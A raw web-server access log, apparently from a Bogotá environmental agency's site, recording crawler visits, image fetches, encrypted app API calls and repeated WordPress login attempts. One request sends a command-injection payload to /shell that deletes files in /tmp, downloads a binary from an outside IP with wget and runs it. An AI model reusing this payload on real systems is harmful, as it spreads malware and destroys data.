201.245.192.253 - - [10/Jul/2022:07:12:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:12:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.214 - - [10/Jul/2022:07:14:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3971.pdf HTTP/1.1" 304 -
185.119.81.101 - - [10/Jul/2022:07:14:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jul/2022:07:14:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [10/Jul/2022:07:13:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:14:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
172.22.2.4 - - [10/Jul/2022:07:16:19 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 304 -
201.245.192.253 - - [10/Jul/2022:07:17:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:17:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:19:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:07:21:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45894
201.245.192.253 - - [10/Jul/2022:07:21:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47266
168.149.233.232 - - [10/Jul/2022:07:21:33 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.95.169.146/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1" 404 1013
172.22.2.4 - - [10/Jul/2022:07:20:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
177.55.157.199 - - [10/Jul/2022:07:21:54 -0500] "GET / HTTP/1.1" 400 946
201.245.192.253 - - [10/Jul/2022:07:22:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:22:57 -0500] "HEAD / HTTP/1.1" 200 -
37.0.8.116 - - [10/Jul/2022:07:23:51 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [10/Jul/2022:07:25:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:07:27:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:07:25:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57699
207.46.13.8 - - [10/Jul/2022:07:27:56 -0500] "GET /autoliquidacion2020 HTTP/1.1" 301 250
216.245.221.92 - - [10/Jul/2022:07:27:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.8 - - [10/Jul/2022:07:28:06 -0500] "GET /autoliquidacion2020/ HTTP/1.1" 200 6146
207.46.13.85 - - [10/Jul/2022:07:30:52 -0500] "GET / HTTP/1.1" 200 319
185.119.81.101 - - [10/Jul/2022:07:30:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jul/2022:07:31:00 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [10/Jul/2022:07:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45894
201.245.192.253 - - [10/Jul/2022:07:31:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47266
162.221.192.26 - - [10/Jul/2022:07:31:34 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [10/Jul/2022:07:32:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:07:30:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jul/2022:07:32:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:32:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [10/Jul/2022:07:31:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53539
181.48.255.197 - - [10/Jul/2022:07:34:28 -0500] "-" 408 -
201.245.192.253 - - [10/Jul/2022:07:37:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:37:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:36:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:37:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
66.249.73.145 - - [10/Jul/2022:07:39:28 -0500] "-" 408 -
74.201.28.29 - - [10/Jul/2022:07:41:04 -0500] "GET / HTTP/1.1" 200 319
185.119.81.101 - - [10/Jul/2022:07:41:09 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [10/Jul/2022:07:41:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [10/Jul/2022:07:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45894
173.252.95.7 - - [10/Jul/2022:07:41:18 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 206 911
173.252.95.120 - - [10/Jul/2022:07:41:18 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 206 911
173.252.95.24 - - [10/Jul/2022:07:41:19 -0500] "GET /images/mujer-reverdece-bogota-16-marzo.jpg HTTP/1.1" 200 54612
201.245.192.253 - - [10/Jul/2022:07:41:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47266
201.245.192.253 - - [10/Jul/2022:07:42:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:42:57 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.45 - - [10/Jul/2022:07:43:10 -0500] "GET /portaldeninos/2021/04/28/dia-internacional-de-concienciacion-sobre-el-ruido-por-una-ciudad-mas-tranquila-y-sostenible HTTP/1.1" 301 -
186.86.33.46 - - [10/Jul/2022:07:43:13 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
207.46.13.45 - - [10/Jul/2022:07:43:20 -0500] "GET /portaldeninos/2021/04/28/dia-internacional-de-concienciacion-sobre-el-ruido-por-una-ciudad-mas-tranquila-y-sostenible/ HTTP/1.1" 200 110349
172.22.2.4 - - [10/Jul/2022:07:42:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:44:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [10/Jul/2022:07:43:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
186.102.31.79 - - [10/Jul/2022:07:47:22 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+apvJ8MjYR+7shWmrY3x72Crbo8ujZJm9gm2YsNoakgBn4a1hW8808&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 30
186.102.31.79 - - [10/Jul/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18CQfPBJ4GBhWcfER4u4Wzk1PdVoDfWr4tS3rM2KhzeqjFih3D5cBp4FDwHSWbjtOkomLsUBGnvjpsqSxSxP1Dp9o1ELC9IQLw=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 97
186.102.31.79 - - [10/Jul/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX195OhWwNHbOgWm6553gE0hsjnoXX0k/7kXtwKqk7l+/i3g8r9FEa9gLfmwbIYf2GOgPukT03YbrZtSyyExko/CN/xmbjdp05lwk/j0bMoCixqJJEt3jjKTbe4HIaLU4/M7gOXGI9tV/PIOAmRU+PtT50sVwapH9oFnGgvXKgHEz9Wr+66LALpifGY1ykbQlNpG5aTlHNO56YPi+9uL9rg9kVWOIxcmfgvJXvkFV9Jcqx0Huzc980fEyjfXtuv+uBawU78315tLgOa6v6IZdHCkB8a/yZ8ToUrlL0++6mRsduxvFP8YEueiqmOjVt1PAFqrfa5WI9RWOnQWU8LUskRUbp+sMo8tU6Tl0sm2tgqwo0OvTj/L1Dfn+PxHQgNZaqAoZ4Qv811QF9VwJEkhfJopeNNLTpum24sOEnh6vmCu23CxMXTE+Kn7E6CLPAzgxoPsmhz6nazXp++g679N8F999N7ugW9kmGC588AiIL4ikJIGrqnVnYzIFwKIUpz+gdhs9zj3M4EEEcqyuQVvm2DDAR1Fhn5SmRc2T9wRtCNPpLmVD4MU0bZf9SwNVS/8mU+mA+5Ov+wE127YcZN4U8kyixX3vQ5lN/NEFl/2QTeuLHPMwPm97xIyN5fhahJjbSGq7OT4DFDr/LXiij1CqDZJvrvFn69AFBiYpTU3EsDaux27lhM/zDEooiQqKudY456d5N+kFhPHdAu/IbXyKmPjJzeJxs8Zb4jE8WFpfiiyJQQMmry6IuVe9pl0aZIdsPPPoe+DdZUgI9BsxKzkmVoctm/c3yPirEHlVoSLfRDS1i8ggtHELjSWFL8WshByOiORB7hvGYbsdu48TxPwAKaG0oBoc5PqdhbGiYbdF6F6D4q00gTPPVhntMWUITWC8wXhVV0OyvG+5RlpHfxV03l1bPoYMKbOyYFV2ODQsilKxaH/aHy/Sqkc6VNPX+cPAPHmcHOtUskDF3R2/6K3a5hp+zvE0LJlnlb6/LSHwUL/UtbvKda7/XFedEpvmyRFPCWBhrI8aY7UUavxEQMowv1OJYmcJxbjxPA/1CE344wi2EgydF0si9rEnWTdL8GWJTELVcKpVr5qG5ImE0YBqYjh4mEk+OtQoOa03ni3pRQxti9CdVQuWbTG3UqYCjhcV2zxFkSpCNTf/mTUUD70/jeYphgK2L+YasVa855VNQici1dhwXfaK5WoBMAm5E0SyH1TrkqHS4vizO5xWklv1AmiUBBoVU4XPZ2kGD8bZMmhB+YPc2AoIQEocaaWQ/YwC5UKmyNXPd0+FrVOVFPCplcBF+YiPOff0hUO2SZgJFePPMaH3RyB4mDq1trkktebGJH6ori0ehRD5lKcMon4rRQZJxicsGprAHRI=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 7481
186.102.31.79 - - [10/Jul/2022:07:47:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX181ixGGX/dTKti7xdEcO8/tCf7+452AGYKiSrQJIdCcSjlXLoS7IYV7WNRftgUEpWLvepcr75+JdUmzFX+GMlERfZ/OQAj+YFBdpE/OfZ4xV2HN4kOlQfwRLHBHw7HjX7YO06DTSkZ5vrIPxTYhK0/bi3BDMHMcS8YzA2t5EdI1hVE6daW7+0r6JR1jhdoDt2qH9oUu0rzrNKgb39tuzRi99VlInwbAVNBhgOxPOibkj/qiJO8BxaD3S8SNpGkxUmhOUeZU/8P4gxo0Zf+k2XPXUujtlnRcLqs=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 176
186.102.31.79 - - [10/Jul/2022:07:47:23 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+apvJ8MjYR+7shWmrY3x72Crbo8ujZJm9gm2YsNoakgBn4a1hW8808 HTTP/1.1" 200 30992
201.245.192.253 - - [10/Jul/2022:07:47:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:47:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:48:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:49:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60410
66.249.73.1 - - [10/Jul/2022:07:51:23 -0500] "-" 408 -
186.102.31.79 - - [10/Jul/2022:07:52:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19BtPPA+UrZUaKKxxeOFdZgMUvLqleCLzdnSwMCqReI3hLJIVUGNca6R519jQ/egc0q2ruuW6r22kIwhnkSBeP47S7UNagJgbN3gzub/Ei2fY097OdQdLqlpJzxQEdlKHdvcf69pL3KrBO+8IkEWLD9EbqteI8veXIs+BVivGHLpIQlVUJggjPOwW9pah5fh4+Hsu6H08+sEHO42zVWwQWJmQKuCCnM8HrWxrnsh5gXXGp60mlBTcgqLZhAjdEUrbK9dpbuekgA6g==&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
186.102.31.79 - - [10/Jul/2022:07:52:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18QcHTJIeKmudGMq8GpVRu7SXfiaftHVS9kiDxbo9ScDflFLI3uxBJhHfRERxZTUoc+eslK817tnP/bV7uKq7RXgo7Un2mBwL85Cxe6QE1OXCHBBkcVuuVuC3/g2ItQIz1dateRqgXxkNHoWyK7a+s5ugzCH8cK/G4LmK/GssKHu25D1zBXvLPc6UDiR+EPLtmBBYYMC3DqQ86+hiGzWbaeHIysp375g5KDX/Wlc+noT2w8lGWXF7sYK72jpK1HcgwaJeBPSSpLLVs8NwM+2M+Y8Khqz1Ljn+rmy5jDAaWov/xWA5CkmDJ/7yWtMoTa875IXlmsxoS+awsnHSqidDVXxLMdoB2GdMqR6CJxupc4c9qNS1zE31DtvNFf1em3TNZY2yK+Xz3Ic1PNYzNKhNDbV0/jMxJQTwRYRoLbUNPl0sEh4TVf9iQI/U1eiLauOA2ZfbMuAR8tHEn4lncU1ltdIECCURtomzCWyuM2Fm9LH5MOg5B+t+q5mKUkvejvCeI+5PQO3ys8JT9D9uZMGPKYsaG6yODgt/aawKp2b1yLsO9OPz+F98Sfce8VWaje1tHa64Y0yV2Mcr9pcvVGRBwBRCf46qD2N77I9maE++nA56v0JGP2gRTPOgEKbyZ/Prhhoko8CE2pEdHYlz6bGiJjpbJRiX2SY3kZ4SQBe44EJteJCHfg3nK5HBBlzKkl0nykhCyJJ9k/ScBwMJR0TWlODsB9Ch4k2/m6DAJgOF+ZvfuBLgGxxOD83YM6WvfCCcqdnOFHzJmoprPJAxBMmRPqwLLFCtOm4Aw9Yd84IE5sOD7A5m8jkkC/o37p0I85s/4MolzkCRrRHRi9G+CR8l3XFuYOoRXgPTovJ+AvFFIyYrtYJwBqvGY15sKWSRc4fokaP0j4zJKdyYUjBFxEVgBY/J8JODypQtPyINIM36DIpRAbAhJbjUuezqobZf8mlcRGo3EllZCsOncdYQ9E4AA5FVwz9T7HtflHpd5+UmRQSIu8CpYlvibY2UZLvJYmEA6aYwTmV5UbZObe2+w3rbg6M2e7lWGP7MUv0iMnlr7Jrvg2lwL3gSR20WquQzoIJeHTEKrjI6aFxrh2zQpW0+8dLxPzrNEBYuAUhKLaTfx/viw+DBVBooiN4CqVgZlWhU3euhHGVakG4EShSyEo5G1fF2BbRf1RsU70WPHEBRqenVGFLixGgmSfcft+psEJDkoaJqvkh0GPUw==&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
186.102.31.79 - - [10/Jul/2022:07:52:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18/ZuZScpTeSN7xofqXOkCftL70l3B2V3e3nTulobHMZj3rbU3FVcFzpyfkmQftOM3kMmrVPQAOk6Em2E26sNE1wMe9Luuc1eZITySoWrnC/YxnIIFNMXJr8+1ukeKaNMdqfKUqJvpLU4AJ/drS3WgTUKYaCV29+Ro=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
186.102.31.79 - - [10/Jul/2022:07:52:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+mOOkGxD1woHA+zE4h8c6LLDW1yC8uDFe8UkKPF6Tglt2fO5zuOLBDaWVuO+V6/DrlivcvrlQ0SHyQrFu8UfB1kKDTniyJ2x7ot9+EowRAq8oOJAWMQUiubm2dgXSlpHHW++XxvezT7+17GVfHtQ9O8C1b0KO9kyE=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
186.102.31.79 - - [10/Jul/2022:07:52:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+N+lWm7of1WSBkCDJckPtJsWMky3R6t/TZLBUkAwSMA1YPzO9xzvJmRemULQdMLdqzAHFhk6fI5G8sp33eSLtSUUKHr6bi+u3DLNvwebXH7PTW+1wNqeqQMHgoIe8RhnurCD7cvaKOuH6R3be3JHDAaaz6MEUTTtM=&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
186.102.31.79 - - [10/Jul/2022:07:52:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX195Q3ZzXAxhFB5JIk3m2kC9fUn8S3eGgZS+5DZwnW6VykHHzw5KpfH3DEfvgeMW6OzrV39gxigItZj9f1mB6z0OC/RouPyo6cGRxw7sdRg5yTn/oaVSyQtpj1U9uT6bXTFfN/WZjEyZeXro+H0ZyrExsexMZGzD/Gq5Xg7eXNX8TIzwxp4Wp/1wSk3Bna4Rf5aDWoLvoMAXBg==&u=U2FsdGVkX19y6+JNL9mGgPSsUP8OzHBsMl5XFZY5u3A+2FoB+xRl/Ay5Hm3E/Q07&y=U2FsdGVkX1/Y3xOrZiCyCJEaeIn50H4H0ZaMcJlXQD4MOSDDa5kdEo+p7mUAMFY7 HTTP/1.1" 200 25
201.245.192.253 - - [10/Jul/2022:07:52:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:52:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:54:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:07:55:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
201.245.192.253 - - [10/Jul/2022:07:57:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
216.245.221.92 - - [10/Jul/2022:07:57:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [10/Jul/2022:08:00:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [10/Jul/2022:08:02:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:08:00:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60992
216.245.221.92 - - [10/Jul/2022:08:02:57 -0500] "HEAD / HTTP/1.1" 200 -
186.30.75.38 - - [10/Jul/2022:08:03:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405798
40.77.167.66 - - [10/Jul/2022:08:04:42 -0500] "GET /Publicaciones/2022EE131225.pdf HTTP/1.1" 404 228
45.61.186.179 - - [10/Jul/2022:08:05:24 -0500] "GET / HTTP/1.1" 200 319
96.44.145.182 - - [10/Jul/2022:08:06:15 -0500] "GET / HTTP/1.1" 200 319
186.30.75.38 - - [10/Jul/2022:08:06:31 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 633976
186.30.75.38 - - [10/Jul/2022:08:07:05 -0500] "GET /BLA/resoluciones/AUTOS%202011/7069.pdf HTTP/1.1" 200 303128
201.245.192.253 - - [10/Jul/2022:08:07:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
172.22.2.4 - - [10/Jul/2022:08:05:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [10/Jul/2022:08:07:57 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [10/Jul/2022:08:08:09 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [10/Jul/2022:08:08:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [10/Jul/2022:08:06:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58491
69.55.55.155 - - [10/Jul/2022:08:10:11 -0500] "GET / HTTP/1.0" 200 319
173.252.107.3 - - [10/Jul/2022:08:11:55 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
173.252.107.11 - - [10/Jul/2022:08:11:57 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.107.12 - - [10/Jul/2022:08:11:58 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
173.252.107.9 - - [10/Jul/2022:08:11:58 -0500] "GET /images/bogota-polvo-sahara-23-mayo.jpg HTTP/1.1" 200 35039
173.252.107.120 - - [10/Jul/2022:08:11:59 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
173.252.107.120 - - [10/Jul/2022:08:12:01 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
173.252.107.1 - - [10/Jul/2022:08:12:01 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
173.252.107.120 - - [10/Jul/2022:08:12:02 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
173.252.107.1 - - [10/Jul/2022:08:12:02 -0500] "GET /images/parque-nal-secretaria.jpg HTTP/1.1" 200 168060
173.252.107.120 - - [10/Jul/2022:08:12:02 -0500] "GET /images/secretaria-rio-bogota-avances-12-mayo.jpg HTTP/1.1" 200 37281
173.252.107.1 - - [10/Jul/2022:08:12:02 -0500] "GET /images/dia-rio-bogota-12-mayo.jpg HTTP/1.1" 200 44387
173.252.107.6 - - [10/Jul/2022:08:12:03 -0500] "GET /images/ptar-alcaldesa-rio-bogota-12-mato.jpg HTTP/1.1" 200 40205
173.252.107.16 - - [10/Jul/2022:08:12:04 -0500] "GET /images/Brasil1.jpeg HTTP/1.1" 200 27965
173.252.107.13 - - [10/Jul/2022:08:12:04 -0500] "GET /images/feria-servicios-5-MAYO.jpg HTTP/1.1" 200 39759
173.252.107.117 - - [10/Jul/2022:08:12:05 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
173.252.107.117 - - [10/Jul/2022:08:12:05 -0500] "GET /images/RCD1.jpg HTTP/1.1" 200 195843
173.252.107.116 - - [10/Jul/2022:08:12:06 -0500] "GET /images/Animales1.jpeg HTTP/1.1" 200 76841
173.252.107.22 - - [10/Jul/2022:08:12:08 -0500] "GET /images/fachada-secretaria-ambiente-abril.jpg HTTP/1.1" 200 148853
173.252.107.120 - - [10/Jul/2022:08:12:10 -0500] "GET /images/ecosistema-dia-internacional-tierra-21-abril.jpg HTTP/1.1" 200 30098
173.252.107.2 - - [10/Jul/2022:08:12:10 -0500] "GET /images/plantacion-jbb-22-abril.jpg HTTP/1.1" 200 52184
173.252.107.20 - - [10/Jul/2022:08:12:10 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
173.252.107.18 - - [10/Jul/2022:08:12:11 -0500] "GET /images/bogota-ciudad-pac28-enero.jpg HTTP/1.1" 200 42642
173.252.127.7 - - [10/Jul/2022:08:12:11 -0500] "GET /images/Bolsaroja.jpeg HTTP/1.1" 200 63719
173.252.107.5 - - [10/Jul/2022:08:12:14 -0500] "GET /images/caminos-cerros-orientales-7-abril.jpg HTTP/1.1" 200 80138
201.245.192.253 - - [10/Jul/2022:08:12:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 45708
31.13.115.116 - - [10/Jul/2022:08:12:53 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
31.13.115.116 - - [10/Jul/2022:08:12:56 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
31.13.115.8 - - [10/Jul/2022:08:12:56 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
216.245.221.92 - - [10/Jul/2022:08:12:57 -0500] "HEAD / HTTP/1.1" 200 -
31.13.103.14 - - [10/Jul/2022:08:12:58 -0500] "GET /images/bogota-polvo-sahara-23-mayo.jpg HTTP/1.1" 200 35039
31.13.115.2 - - [10/Jul/2022:08:13:00 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
31.13.115.2 - - [10/Jul/2022:08:13:03 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
31.13.115.116 - - [10/Jul/2022:08:13:04 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
31.13.115.2 - - [10/Jul/2022:08:13:05 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
31.13.115.14 - - [10/Jul/2022:08:13:05 -0500] "GET /images/parque-nal-secretaria.jpg HTTP/1.1" 200 168060
31.13.115.116 - - [10/Jul/2022:08:13:07 -0500] "GET /images/ptar-alcaldesa-rio-bogota-12-mato.jpg HTTP/1.1" 200 40205
31.13.115.2 - - [10/Jul/2022:08:13:07 -0500] "GET /images/dia-rio-bogota-12-mayo.jpg HTTP/1.1" 200 44387
31.13.115.14 - - [10/Jul/2022:08:13:07 -0500] "GET /images/secretaria-rio-bogota-avances-12-mayo.jpg HTTP/1.1" 200 37281
172.22.2.4 - - [10/Jul/2022:08:11:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.4 - - [10/Jul/2022:08:13:28 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.117 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.117 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.116 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.119 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.120 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.116 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.4 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.116 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
69.63.184.120 - - [10/Jul/2022:08:13:29 -0500] "GET /mirla-un-ave-que-recorre-y-habita-diferentes-ecosistemas-de-bogota.html HTTP/1.1" 206 728
172.22.2.4 - - [10/Jul/2022:08:12:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56911
